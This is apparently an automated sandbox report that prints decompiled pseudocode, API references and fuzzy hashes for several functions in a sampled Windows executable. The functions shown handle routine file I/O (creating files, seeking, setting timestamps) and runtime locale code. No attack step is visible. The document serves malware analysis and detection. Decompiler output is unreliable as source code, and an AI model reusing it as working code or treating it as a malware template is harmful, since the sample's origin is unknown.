Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: da1bb89141dac37497ff90a9e4a0e8a9573210c1563a267e77dc377bdc40b4eb
Instruction ID: d515c413b047292fbf79b7eb4f95c163e095907239ec8696c6a0a93036551f04
Opcode Fuzzy Hash: da1bb89141dac37497ff90a9e4a0e8a9573210c1563a267e77dc377bdc40b4eb
Instruction Fuzzy Hash: 4751F474900246AFDB24EF75C891EBABBE5EF41300F1844FED4A68B271DB359946CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B69A74 Relevance: 3.1, APIs: 2, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00B69A74(signed int __ecx, long* _a4, signed int _a8, long _a12, signed int _a20, char _a24, long _a4124, long _a4128, long _a4132) {
				signed int _v0;
				long* _v4;
				intOrPtr _v8;
				void* _t30;
				long _t32;
				signed int _t33;
				void* _t35;
				long* _t38;
				void* _t41;
				long _t42;
				signed int _t46;
				long _t50;
				void* _t51;
				long _t52;
				intOrPtr* _t53;
				void* _t57;
				void* _t63;
				signed int _t67;
				signed int _t70;

				E00B7EC50(0x1018);
				_t50 = _a4132;
				_t42 = _a4128;
				_t53 = __ecx;
				_t52 = _a4124;
				_v0 = __ecx;
				if( *((intOrPtr*)(__ecx + 8)) == 0xffffffff) {
					L21:
					_t30 = 1;
					L22:
					return _t30;
				}
				if( *((intOrPtr*)(__ecx + 0x10)) != 1) {
					__eflags = _t42;
					if(__eflags > 0) {
						L32:
						_a12 = _t42;
						_t32 = SetFilePointer( *(_t53 + 8), _t52,  &_a12, _t50); // executed
						__eflags = _t32 - 0xffffffff;
						if(_t32 != 0xffffffff) {
							goto L21;
						}
						_t33 = GetLastError();
						asm("sbb al, al");
						_t30 =  ~_t33 + 1;
						goto L22;
					}
					if(__eflags < 0) {
						L27:
						__eflags = _t50;
						if(_t50 == 0) {
							goto L32;
						}
						__eflags = _t50 - 1;
						if(_t50 != 1) {
							_t35 = E00B6981A(_t50);
						} else {
							 *0xb93278();
							_t35 =  *((intOrPtr*)( *((intOrPtr*)( *_t53 + 0x14))))();
							_t53 = _v0;
						}
						_t52 = _t52 + _t35;
						asm("adc ebx, edx");
						_t50 = 0;
						__eflags = 0;
						goto L32;
					}
					__eflags = _t52;
					if(_t52 >= 0) {
						goto L32;
					}
					goto L27;
				}
				_t38 = __ecx + 0x28;
				_a4 = _t38;
				if(_t50 != 1) {
					__eflags = _t50;
					if(_t50 != 0) {
						L23:
						_t30 = 0;
						goto L22;
					}
					L5:
					_t63 = _t42 - _t38[1];
					if(_t63 < 0 || _t63 <= 0 && _t52 <  *_t38) {
						goto L23;
					} else {
						_t46 = _t42;
						_t57 = _t52 -  *_t38;
						asm("sbb ecx, [eax+0x4]");
						_a8 = _t46;
						if(_t57 != 0 || _t57 != 0) {
							do {
								_t67 = _t46;
								if(_t67 > 0 || _t67 >= 0 && _t57 >= 0x1000) {
									L14:
									_t12 =  &_a20;
									 *_t12 = _a20 & 0x00000000;
									__eflags =  *_t12;
									_t51 = 0x1000;
									goto L15;
								} else {
									_t51 = _t57;
									_a20 = _t46;
									L15:
									 *0xb93278( &_a24, _t51);
									_t41 =  *((intOrPtr*)( *((intOrPtr*)( *_t53 + 0xc))))();
									if(_t41 <= 0) {
										goto L23;
									}
									_t46 = _v0;
									_t53 = _v8;
									asm("cdq");
									_t57 = _t57 - _t41;
									asm("sbb ecx, edx");
									_v0 = _t46;
									_t70 = _t46;
									if(_t70 > 0) {
										goto L14;
									}
								}
							} while (_t70 >= 0 && _t57 != 0);
							_t38 = _v4;
							goto L20;
						} else {
							L20:
							 *_t38 = _t52;
							_t38[1] = _t42;
							goto L21;
						}
					}
				}
				_t52 = _t52 +  *_t38;
				asm("adc ebx, [eax+0x4]");
				goto L5;
			}

0x00b69a79
0x00b69a7e
0x00b69a86
0x00b69a8f
0x00b69a92
0x00b69a99
0x00b69aa1
0x00b69b53
0x00b69b53
0x00b69b59
0x00b69b5f
0x00b69b5f
0x00b69aab
0x00b69b66
0x00b69b68
0x00b69b9d
0x00b69ba2
0x00b69bab
0x00b69bb1
0x00b69bb4
0x00000000
0x00000000
0x00b69bb6
0x00b69bbe
0x00b69bc0
0x00000000
0x00b69bc0
0x00b69b6a
0x00b69b70
0x00b69b70
0x00b69b72
0x00000000
0x00000000
0x00b69b74
0x00b69b77
0x00b69b92
0x00b69b79
0x00b69b80
0x00b69b8a
0x00b69b8c
0x00b69b8c
0x00b69b97
0x00b69b99
0x00b69b9b
0x00b69b9b
0x00000000
0x00b69b9b
0x00b69b6c
0x00b69b6e
0x00000000
0x00000000
0x00000000
0x00b69b6e
0x00b69ab1
0x00b69ab4
0x00b69abb
0x00b69ac4
0x00b69ac6
0x00b69b62
0x00b69b62
0x00000000
0x00b69b62
0x00b69acc
0x00b69acc
0x00b69acf
0x00000000
0x00b69adf
0x00b69ae1
0x00b69ae3
0x00b69ae5
0x00b69ae8
0x00b69aec
0x00b69af2
0x00b69af2
0x00b69af4
0x00b69b08
0x00b69b08
0x00b69b08
0x00b69b08
0x00b69b0d
0x00000000
0x00b69b00
0x00b69b00
0x00b69b02
0x00b69b12
0x00b69b1f
0x00b69b29
0x00b69b2d
0x00000000
0x00000000
0x00b69b2f
0x00b69b33
0x00b69b37
0x00b69b38
0x00b69b3a
0x00b69b3c
0x00b69b40
0x00b69b42
0x00000000
0x00000000
0x00b69b42
0x00b69b44
0x00b69b4a
0x00000000
0x00b69b4e
0x00b69b4e
0x00b69b4e
0x00b69b50
0x00000000
0x00b69b50
0x00b69aec
0x00b69acf
0x00b69abd
0x00b69abf
0x00000000

APIs

SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00B69A50,?,?,00000000,?,?,00B68CBC,?), ref: 00B69BAB
GetLastError.KERNEL32(?,00000000,00B68411,-00009570,00000000,000007F3), ref: 00B69BB6

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 759fafa2e2b5cd27471f28ba01fe232b88abe44435d4c288f40ae4c8b6bcdc02
Instruction ID: 4731e7208539564bc63a63ff0a9c482136aab7544139fb4dfc8572b2f963bf6f
Opcode Fuzzy Hash: 759fafa2e2b5cd27471f28ba01fe232b88abe44435d4c288f40ae4c8b6bcdc02
Instruction Fuzzy Hash: 20412231604301CFDB24DF25E58486AB7EDFFD9720F188AAEE89583260D778EC058B91

Uniqueness

Uniqueness Score: -1.00%

Function 00B8BA27 Relevance: 3.1, APIs: 2, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00B8BA27(signed int __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, char _a8) {
				char _v8;
				char _v16;
				void* __ebp;
				char _t31;
				void* _t32;
				signed int _t36;
				char _t40;
				intOrPtr _t44;
				char _t45;
				signed int _t51;
				void* _t64;
				void* _t70;
				signed int _t75;
				void* _t81;

				_t81 = __eflags;
				_t68 = __edx;
				_v8 = E00B897E5(__ebx, __ecx, __edx);
				E00B8BB4E(__ebx, __ecx, __edx, __edi, __esi, _t81);
				_t31 = E00B8B7BB(_t81, _a4);
				_v16 = _t31;
				_t57 =  *(_v8 + 0x48);
				if(_t31 ==  *((intOrPtr*)( *(_v8 + 0x48) + 4))) {
					return 0;
				}
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t32 = E00B88E06(_t57, 0x220); // executed
				_t70 = _t32;
				_t51 = __ebx | 0xffffffff;
				__eflags = _t70;
				if(__eflags == 0) {
					L5:
					_t75 = _t51;
					goto L6;
				} else {
					_t70 = memcpy(_t70,  *(_v8 + 0x48), 0x88 << 2);
					 *_t70 =  *_t70 & 0x00000000; // executed
					_t36 = E00B8BBF0(_t68, _t70, __eflags, _v16, _t70); // executed
					_t75 = _t36;
					__eflags = _t75 - _t51;
					if(_t75 != _t51) {
						__eflags = _a8;
						if(_a8 == 0) {
							E00B88B6F();
						}
						asm("lock xadd [eax], ebx");
						__eflags = _t51 == 1;
						if(_t51 == 1) {
							_t45 = _v8;
							__eflags =  *((intOrPtr*)(_t45 + 0x48)) - 0xb9ec70;
							if( *((intOrPtr*)(_t45 + 0x48)) != 0xb9ec70) {
								E00B88DCC( *((intOrPtr*)(_t45 + 0x48)));
							}
						}
						 *_t70 = 1;
						_t64 = _t70;
						_t70 = 0;
						 *(_v8 + 0x48) = _t64;
						_t40 = _v8;
						__eflags =  *(_t40 + 0x350) & 0x00000002;
						if(( *(_t40 + 0x350) & 0x00000002) == 0) {
							__eflags =  *0xb9eef0 & 0x00000001;
							if(( *0xb9eef0 & 0x00000001) == 0) {
								_v16 =  &_v8;
								E00B8B691(5,  &_v16);
								__eflags = _a8;
								if(_a8 != 0) {
									_t44 =  *0xb9ee90; // 0x31a1f48
									 *0xb9e964 = _t44;
								}
							}
						}
						L6:
						E00B88DCC(_t70);
						return _t75;
					} else {
						 *((intOrPtr*)(E00B891A8())) = 0x16;
						goto L5;
					}
				}
			}

0x00b8ba27
0x00b8ba27
0x00b8ba34
0x00b8ba37
0x00b8ba3f
0x00b8ba48
0x00b8ba4b
0x00b8ba51
0x00000000
0x00b8ba53
0x00b8ba57
0x00b8ba58
0x00b8ba59
0x00b8ba5f
0x00b8ba64
0x00b8ba66
0x00b8ba6a
0x00b8ba6c
0x00b8ba9c
0x00b8ba9c
0x00000000
0x00b8ba6e
0x00b8ba7b
0x00b8ba81
0x00b8ba84
0x00b8ba89
0x00b8ba8d
0x00b8ba8f
0x00b8baae
0x00b8bab2
0x00b8bab4
0x00b8bab4
0x00b8babf
0x00b8bac3
0x00b8bac4
0x00b8bac6
0x00b8bac9
0x00b8bad0
0x00b8bad5
0x00b8bada
0x00b8bad0
0x00b8badb
0x00b8bae1
0x00b8bae6
0x00b8bae8
0x00b8baeb
0x00b8baee
0x00b8baf5
0x00b8baf7
0x00b8bafe
0x00b8bb03
0x00b8bb0c
0x00b8bb11
0x00b8bb17
0x00b8bb19
0x00b8bb1e
0x00b8bb1e
0x00b8bb17
0x00b8bafe
0x00b8ba9e
0x00b8ba9f
0x00000000
0x00b8ba91
0x00b8ba96
0x00000000
0x00b8ba96
0x00b8ba8f

APIs

Part of subcall function 00B897E5: GetLastError.KERNEL32(?,00BA1098,00B84674,00BA1098,?,?,00B840EF,?,?,00BA1098), ref: 00B897E9
Part of subcall function 00B897E5: _free.LIBCMT ref: 00B8981C
Part of subcall function 00B897E5: SetLastError.KERNEL32(00000000,?,00BA1098), ref: 00B8985D
Part of subcall function 00B897E5: _abort.LIBCMT ref: 00B89863

Part of subcall function 00B8BB4E: _abort.LIBCMT ref: 00B8BB80
Part of subcall function 00B8BB4E: _free.LIBCMT ref: 00B8BBB4

Part of subcall function 00B8B7BB: GetOEMCP.KERNEL32(00000000,?,?,00B8BA44,?), ref: 00B8B7E6

_free.LIBCMT ref: 00B8BA9F
_free.LIBCMT ref: 00B8BAD5

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID:
API String ID: 2991157371-0
Opcode ID: e95e683165c7cbc90977500ce08d5791a453264c7ef60b947c2b5160d087b49d
Instruction ID: 5dc545a8d6ebec53c8657217c3f9562d98d06b19e61b723d7754e93cde54d3dd
Opcode Fuzzy Hash: e95e683165c7cbc90977500ce08d5791a453264c7ef60b947c2b5160d087b49d
Instruction Fuzzy Hash: C4317E31904209AFDB14FBA8D441FA9B7E5EF40320F2540DAE9249B2B2EF329D41DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00B61E50 Relevance: 3.1, APIs: 2, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00B61E50(intOrPtr __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t38;
				intOrPtr _t47;
				void* _t68;
				unsigned int _t70;
				signed int _t72;
				intOrPtr* _t74;
				void* _t76;

				_t68 = __edx;
				E00B7EB78(0xb92673, _t76);
				_t55 = 0;
				 *((intOrPtr*)(_t76 - 0x10)) = __ecx;
				 *((intOrPtr*)(_t76 - 0x24)) = 0;
				 *(_t76 - 0x20) = 0;
				 *((intOrPtr*)(_t76 - 0x1c)) = 0;
				 *((intOrPtr*)(_t76 - 0x18)) = 0;
				 *((char*)(_t76 - 0x14)) = 0;
				_push(0);
				_push(0);
				 *((intOrPtr*)(_t76 - 4)) = 0;
				_push(_t76 - 0x24);
				_t38 = E00B63BBA(__ecx); // executed
				if(_t38 != 0) {
					_t70 =  *(_t76 - 0x20);
					E00B61732(_t76 - 0x24, _t68, 1);
					_t74 =  *((intOrPtr*)(_t76 + 8));
					 *((char*)( *(_t76 - 0x20) +  *((intOrPtr*)(_t76 - 0x24)) - 1)) = 0;
					_t16 = _t70 + 1; // 0x1
					E00B618A9(_t74, _t16);
					_t47 =  *((intOrPtr*)(_t76 - 0x10));
					if( *((intOrPtr*)(_t47 + 0x6cc8)) != 3) {
						if(( *(_t47 + 0x460c) & 0x00000001) == 0) {
							E00B71B84( *((intOrPtr*)(_t76 - 0x24)),  *_t74,  *((intOrPtr*)(_t74 + 4)));
						} else {
							_t72 = _t70 >> 1;
							E00B71BFD( *((intOrPtr*)(_t76 - 0x24)),  *_t74, _t72);
							 *((short*)( *_t74 + _t72 * 2)) = 0;
						}
					} else {
						_push( *((intOrPtr*)(_t74 + 4)));
						_push( *_t74);
						_push( *((intOrPtr*)(_t76 - 0x24)));
						E00B71C3B();
					}
					E00B618A9(_t74, E00B83E13( *_t74));
					_t55 = 1;
				}
				_t39 =  *((intOrPtr*)(_t76 - 0x24));
				 *((intOrPtr*)(_t76 - 4)) = 2;
				if( *((intOrPtr*)(_t76 - 0x24)) != 0) {
					if( *((char*)(_t76 - 0x14)) != 0) {
						E00B6F445(_t39,  *((intOrPtr*)(_t76 - 0x1c)));
						_t39 =  *((intOrPtr*)(_t76 - 0x24));
					}
					L00B83E2E(_t39);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t76 - 0xc));
				return _t55;
			}

0x00b61e50
0x00b61e55
0x00b61e5e
0x00b61e62
0x00b61e65
0x00b61e68
0x00b61e6b
0x00b61e6e
0x00b61e71
0x00b61e74
0x00b61e75
0x00b61e79
0x00b61e7c
0x00b61e7f
0x00b61e86
0x00b61e8e
0x00b61e96
0x00b61ea1
0x00b61ea4
0x00b61ea8
0x00b61eae
0x00b61eb3
0x00b61ebd
0x00b61ed5
0x00b61ef6
0x00b61ed7
0x00b61ed7
0x00b61edf
0x00b61ee8
0x00b61ee8
0x00b61ebf
0x00b61ebf
0x00b61ec2
0x00b61ec4
0x00b61ec7
0x00b61ec7
0x00b61f06
0x00b61f0c
0x00b61f0e
0x00b61f0f
0x00b61f12
0x00b61f1b
0x00b61f21
0x00b61f27
0x00b61f2c
0x00b61f2c
0x00b61f30
0x00b61f35
0x00b61f3c
0x00b61f44

APIs

__EH_prolog.LIBCMT ref: 00B61E55

Part of subcall function 00B63BBA: __EH_prolog.LIBCMT ref: 00B63BBF

_wcslen.LIBCMT ref: 00B61EFD

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: H_prolog$_wcslen
String ID:
API String ID: 2838827086-0
Opcode ID: eebcc4a84660b3434558c1f7966ea508fe40aa653f7299cd74be06bdf9e8acc9
Instruction ID: de51c28ac47ce8ad55384968173b0abdc9ef9f01b046c5aa4f58b2cbb7915070
Opcode Fuzzy Hash: eebcc4a84660b3434558c1f7966ea508fe40aa653f7299cd74be06bdf9e8acc9
Instruction Fuzzy Hash: 55312A71904209AFCF15DF9DC955AEEBBF5EF48300F1448A9F455A7251CB3A9E10CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B69DA2 Relevance: 3.1, APIs: 2, Instructions: 83
timeCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00B69DA2(void* __ecx, void* __esi, signed int _a4, signed int* _a8, signed int* _a12) {
				void* _v8;
				void* _v16;
				void* _v24;
				signed char _v25;
				signed char _v26;
				int _t35;
				signed char _t50;
				signed int* _t52;
				signed char _t58;
				void* _t59;
				void* _t60;
				signed int* _t61;
				signed int* _t63;

				_t60 = __esi;
				_t59 = __ecx;
				if( *(__ecx + 0x20) != 0x100 && ( *(__ecx + 0x20) & 0x00000002) == 0) {
					FlushFileBuffers( *(__ecx + 8));
				}
				_t52 = _a4;
				_t50 = 1;
				if(_t52 == 0 || ( *_t52 | _t52[1]) == 0) {
					_t58 = 0;
					_v25 = 0;
				} else {
					_t58 = 1;
					_v25 = 1;
				}
				_push(_t60);
				_t61 = _a8;
				if(_t61 == 0) {
					L9:
					_v26 = 0;
				} else {
					_v26 = _t50;
					if(( *_t61 | _t61[1]) == 0) {
						goto L9;
					}
				}
				_t63 = _a12;
				if(_t63 == 0 || ( *_t63 | _a4) == 0) {
					_t50 = 0;
				}
				if(_t58 != 0) {
					E00B7138A(_t52, _t58,  &_v24);
				}
				if(_v26 != 0) {
					E00B7138A(_t61, _t58,  &_v8);
				}
				if(_t50 != 0) {
					E00B7138A(_t63, _t58,  &_v16);
				}
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				_t35 = SetFileTime( *(_t59 + 8),  ~(_v26 & 0x000000ff) &  &_v8,  ~(_t50 & 0x000000ff) &  &_v16,  ~(_v25 & 0x000000ff) &  &_v24); // executed
				return _t35;
			}

0x00b69da2
0x00b69da8
0x00b69db1
0x00b69dbc
0x00b69dbc
0x00b69dc2
0x00b69dc8
0x00b69dcb
0x00b69ddc
0x00b69dde
0x00b69dd4
0x00b69dd4
0x00b69dd6
0x00b69dd6
0x00b69de2
0x00b69de3
0x00b69de9
0x00b69df6
0x00b69df6
0x00b69deb
0x00b69df0
0x00b69df4
0x00000000
0x00000000
0x00b69df4
0x00b69dfb
0x00b69e01
0x00b69e0b
0x00b69e0b
0x00b69e0f
0x00b69e16
0x00b69e16
0x00b69e20
0x00b69e29
0x00b69e29
0x00b69e31
0x00b69e3a
0x00b69e3a
0x00b69e4a
0x00b69e58
0x00b69e68
0x00b69e70
0x00b69e7c

APIs

FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00B673BC,?,?,?,00000000), ref: 00B69DBC
SetFileTime.KERNELBASE(?,?,?,?), ref: 00B69E70

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: 03025cfc09a99fc6762a872f5cb1e9e845c715c743f28fd0cdde642fde10f806
Instruction ID: a01a5f08e5642a57a005c52ac8f8685b56fb5a928ed981b0991fa671e7c3b8ad
Opcode Fuzzy Hash: 03025cfc09a99fc6762a872f5cb1e9e845c715c743f28fd0cdde642fde10f806
Instruction Fuzzy Hash: 4021D031248246ABC714CF78C891AABBBE8EF55704F0849ADF4D587141D33DE90D9B61

Uniqueness

Uniqueness Score: -1.00%

Function 00B6966E Relevance: 3.1, APIs: 2, Instructions: 82
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B6966E(void* __ecx, WCHAR* _a4100, signed char _a4104) {
				short _v0;
				signed int _t27;
				void* _t29;
				signed char _t38;
				signed int _t42;
				long _t45;
				void* _t46;
				long _t48;

				E00B7EC50(0x1000);
				_t38 = _a4104;
				_t46 = __ecx;
				_t42 = _t38 >> 1;
				if((_t38 & 0x00000010) != 0) {
					L3:
					_t48 = 1;
					__eflags = 1;
				} else {
					_t52 =  *((char*)(__ecx + 0x30));
					if( *((char*)(__ecx + 0x30)) != 0) {
						goto L3;
					} else {
						_t48 = 0;
					}
				}
				 *(_t46 + 0x20) = _t38;
				_t45 = ((_t42 ^ 0x00000001) << 0x1f) + 0x40000000;
				_t27 =  *(E00B6C27E(_t52, _a4100)) & 0x0000ffff;
				if(_t27 == 0x2e || _t27 == 0x20) {
					if((_t38 & 0x00000020) != 0) {
						goto L8;
					} else {
						_t39 = _a4100;
						_t29 = _t27 | 0xffffffff;
					}
				} else {
					L8:
					_t39 = _a4100;
					__eflags = 0;
					_t29 = CreateFileW(_a4100, _t45, _t48, 0, 2, 0, 0); // executed
				}
				 *(_t46 + 8) = _t29;
				if(_t29 == 0xffffffff && E00B6BB03(_t39,  &_v0, 0x800) != 0) {
					 *(_t46 + 8) = CreateFileW( &_v0, _t45, _t48, 0, 2, 0, 0);
				}
				 *(_t46 + 0x10) =  *(_t46 + 0x10) & 0x00000000;
				 *((char*)(_t46 + 0x1c)) = 1;
				 *((char*)(_t46 + 0x15)) = 0;
				return E00B70602(_t46 + 0x32, _t39, 0x800) & 0xffffff00 |  *(_t46 + 8) != 0xffffffff;
			}

0x00b69673
0x00b69679
0x00b69685
0x00b69687
0x00b6968c
0x00b69698
0x00b6969a
0x00b6969a
0x00b6968e
0x00b6968e
0x00b69692
0x00000000
0x00b69694
0x00b69694
0x00b69694
0x00b69692
0x00b696a9
0x00b696ac
0x00b696b7
0x00b696bd
0x00b696c7
0x00000000
0x00b696c9
0x00b696c9
0x00b696d0
0x00b696d0
0x00b696d5
0x00b696d5
0x00b696d5
0x00b696dc
0x00b696e6
0x00b696e6
0x00b696ec
0x00b696f2
0x00b6971c
0x00b6971c
0x00b6971f
0x00b6972d
0x00b69731
0x00b6974b

APIs

CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00B69F27,?,?,00B6771A), ref: 00B696E6
CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00B69F27,?,?,00B6771A), ref: 00B69716

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 4951c71504f5350e8d2efe1dbcb72dc90f36ce3e516497dd9c4432430e01571d
Instruction ID: 6d0ace9da0d18369074102f4af37df79c9e4b4b156c8ced6b261b4045d35b317
Opcode Fuzzy Hash: 4951c71504f5350e8d2efe1dbcb72dc90f36ce3e516497dd9c4432430e01571d
Instruction Fuzzy Hash: 8021DEB1104344AFE3308A65CC89FF7B7DCEB49324F144A59FAE6C21D1C7B8A8849A71

Uniqueness

Uniqueness Score: -1.00%

Function 00B69E80 Relevance: 3.1, APIs: 2, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00B69E80(void* __ecx) {
				long _v8;
				void* __ebp;
				long _t13;
				long _t15;
				signed int _t17;
				char* _t33;
				void* _t36;
				long _t37;
				void* _t39;

				_push(__ecx);
				_t36 = __ecx;
				_t33 = __ecx + 0x1e;
				if( *((intOrPtr*)(__ecx + 8)) != 0xffffffff) {
					_t21 = __ecx + 0x32;
					goto L4;
				} else {
					if( *_t33 == 0) {
						L12:
						_t17 = _t13 | 0xffffffff;
					} else {
						_t21 = __ecx + 0x32;
						E00B66D5B(0xba1098, _t39, __ecx + 0x32);
						L4:
						if( *((intOrPtr*)(_t36 + 0x10)) != 1) {
							_v8 = _v8 & 0x00000000;
							_t15 = SetFilePointer( *(_t36 + 8), 0,  &_v8, 1); // executed
							_t37 = _t15;
							if(_t37 != 0xffffffff) {
								L10:
								asm("cdq");
								_t17 = 0 + _t37;
								asm("adc edx, 0x0");
							} else {
								_t13 = GetLastError();
								if(_t13 == 0) {
									goto L10;
								} else {
									if( *_t33 == 0) {
										goto L12;
									} else {
										E00B66D5B(0xba1098, _t39, _t21);
										goto L10;
									}
								}
							}
						} else {
							_t17 =  *(_t36 + 0x28);
						}
					}
				}
				return _t17;
			}

0x00b69e83
0x00b69e86
0x00b69e8d
0x00b69e90
0x00b69ea7
0x00000000
0x00b69e92
0x00b69e95
0x00b69f02
0x00b69f02
0x00b69e97
0x00b69e97
0x00b69ea0
0x00b69eaa
0x00b69eae
0x00b69eb8
0x00b69ec7
0x00b69ecd
0x00b69ed2
0x00b69eee
0x00b69ef3
0x00b69ef8
0x00b69efa
0x00b69ed4
0x00b69ed4
0x00b69edc
0x00000000
0x00b69ede
0x00b69ee1
0x00000000
0x00b69ee3
0x00b69ee9
0x00000000
0x00b69ee9
0x00b69ee1
0x00b69edc
0x00b69eb0
0x00b69eb0
0x00b69eb3
0x00b69eae
0x00b69e95
0x00b69f01

APIs

SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00B69EC7
GetLastError.KERNEL32 ref: 00B69ED4

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

